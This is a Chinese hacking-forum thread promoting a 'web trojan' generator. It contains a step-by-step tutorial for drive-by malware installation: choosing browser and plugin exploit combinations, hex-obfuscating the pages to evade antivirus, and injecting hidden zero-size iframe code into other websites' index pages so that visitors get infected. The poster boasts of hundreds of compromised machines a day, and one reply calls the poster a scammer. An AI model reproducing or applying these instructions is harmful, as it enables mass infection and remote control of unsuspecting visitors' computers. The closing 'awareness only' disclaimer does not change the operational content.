版本最全的网马生成器！附挂马教程！

woaimen

支持一下,好东西

627358024

xuxi!!!!

ndz121

回复 1# zhangjiarui37

bisu

这个是骗子!!!这个人是骗子,大家别上当,,,我被他骗了1200.,,,有图为证!!想看的人可以联系我QQ 142****4752
此骗子QQ:19***07  网站:www.jxfhack.com

15107847473

555****5555

zhangjiarui37

asdg asdg ads gasd

1365039845

下来学习一下啊

lonyher

支持 楼主

zhangjiarui37

版本最全的网马生成器！附挂马教程！

揭秘黑客们是怎么挂马的（附挂马教程）菜鸟一看就懂！

关键词：
挂马 = 在网页上放置一串 iframe 隐藏调用代码，链接置配置好的网马地址。
网马 = 用来搜索客户端系统或第三方软件漏洞并下载、执行木马的一个网页。
漏洞 = 分为系统漏洞和软件漏洞，网马的成功执行前提是客户端必需有相应的漏洞。
中率 = 网马的中招率，也就是中马的概率，如1000个IP访问了挂了马的网页，其中200个成功的中了木马，其网马的中率就是20%。
肉鸡 = 任人宰割的机器，简称肉机，俗称：肉鸡。黑客拥有肉鸡的远程完全控制权。
想必现在有些站长也有别人挂过马的经历吧，那么请花几分钟看完这篇文章。
大家都知道的，这年头很多机器都装了360，杀毒软件，系统全部自动打补丁了。很多人说靠一些免费的网马生成器，是不会有多少中率的。
现在大家看看如何制作一份属于自己的网马，免杀可能不能过一些杀毒软件的主动防御。但是我用这种自己的做网马的方式，日流量5000左右的站，挂一天也能上300~400个肉鸡。
百度搜索 网马，第一个，是个博客，在里面找到了很多网马生成器。经过我的一些测试，在这里下载了3个网马生成器。很多网马生成器，有些很垃圾，shellcode完全是唬烂的，根本不能运行。
看下面这两款网马生成器：
http://www.jxfhack.com/article/4.htm
http://www.jxfhack.com/article/58.htm
一个是综合漏洞网马，一个是ie70day漏洞网马。还有一个独立的flash漏洞网马生成器。他的免费综合网马已经包含了flash.,所以就不下载flash生成器了。
大家先下载下来。免费发布的版本，是别想免杀了，收费的买不起，自己研究了很久，也成功地做出了属于自己的免杀网马！
瑞星2009还是过不去，太牛X了。flash的漏洞卡巴主动也过不去。其他的基本都能过了。
现在把方法讲解给大家。
首先，在洞洞的选择上面。有些洞洞中率比较垃圾，如果放上去，可能会造成网页运行缓慢甚至停止响应，不求数量而求质量。
我们再生成器上面
  下载 (50.86 KB)

2010-4-14 20:26
  下载 (30.85 KB)

2010-4-14 20:26
这个是flash的   下载 (43.84 KB)

2010-4-14 20:26
看到了不少漏洞，首先是漏洞的选择.我推荐的组合是：MS06***14+MS08***53+暴风漏洞+real11+flash+IE7
为什么选取这些漏洞呢，因为ms06***14是经典的漏洞，08***53运行的成功率高。很多的番茄啊，深度的系统，默认都是使用暴风影音的，这样的软件很少有人会去下载新版本，新版本广告多而且不稳定。real11的安装量也很大。flash不用说，只要是sp2的系统刚刚装完，flash基本是115版本的，肯定能中。。IE7新出的，。网上生成器很多，我找了1晚上，在上面说的那个网站上面下载的是我唯一运行成功的。shellcode编写的很不错，下载那个高级版本的生成。
用iframe框架来调用。首先其他的几个洞洞全部是htm格式的。免杀的方法是，在网上找网页加密器。
搜索一下很多的。主要是进制的转换，或者大小写改下。再这里可以下载到一个进制转换器。全部转换成16进制的、http://download.csdn.net/source/764837凡是生成htm格式的，全部用记事本打开之后。转换进制。或者再里面加上一些干扰的文字，主要是不要破坏网马的完整性。然后就是加密，转换进制。关于flash网马，我曾经尝试用myccl修改，但是卡巴本地扫描不出来，一上传，开启主动就杀毒的叫了。这个我也没辙了。反正叫就叫吧，照样挂上。这个是个技术活，也是个体力活。
几个洞全部制作完毕之后，就利用iframe框架调用。比如生成的漏洞为 ms06***14.htm ms08***53.htm.real.htm.flash.htm  就自己新建一个HTM的页面，如muma.htm，用记事本编辑。
内容如下：
<iframe src=www.1.com/ms06***14.htm width=0 height=0></iframe>
<iframe src=www.1.com/ms08***53.htm width=0 height=0></iframe>
<iframe src=www.1.com/realhtm width=0 height=0></iframe>
<iframe src=www.1.com/flash.htm width=0 height=0></iframe>
然后把muma.htm和ms06***14.htm ms08***53.htm.real.htm.flash.htm这几个网页文件和你的木马放在同一个文件夹内，上传至FTP。
然后就可以在任何网页上挂马了。怎么挂？对，很简单，还是用 iframe
代码就是这个 <iframe src=域名/网马的目录/网马文件名 width=0 height=0></iframe>
看得出来 width=0 height=0 宽度和高度都是0，也就是不显示。
比如你的域名是http://www.abc.com，网马放在根目录的 def 文件夹下面。那么代码就是：
<iframe src=www.abc.com/def/muma.htm width=0 height=0></iframe>
例如要在http://www.xxx.com的首页挂马，如他的首页文件是 index.html，那么打开index.html，编辑index.html，在网页里放入你的代码，也就是<iframe src=www.abc.com/def/muma.htm width=0 height=0></iframe>，那么，别人只要打开访问了http://www.xxx.com就等于执行了你的网马，如果他的电脑有相应的漏洞，那么可以恭喜他，中了你的木马。
还有一些js的挂马方式，js变形就需要基本的一些网页制作知识了。这里就不多说了。辛辛苦苦打了这么多字，希望各位对网页木马有基本的了解。有什么错误不足请高手指正~
看完了觉得有点启发的话，请回个贴~
在此声明，所写的这篇文章不是鼓励大家去挂马，而是让大家对网马有所了解，有基本的防范意识。
教程下载地址：点击下载

天阁梅

先看看！！！！！！！！！！！！！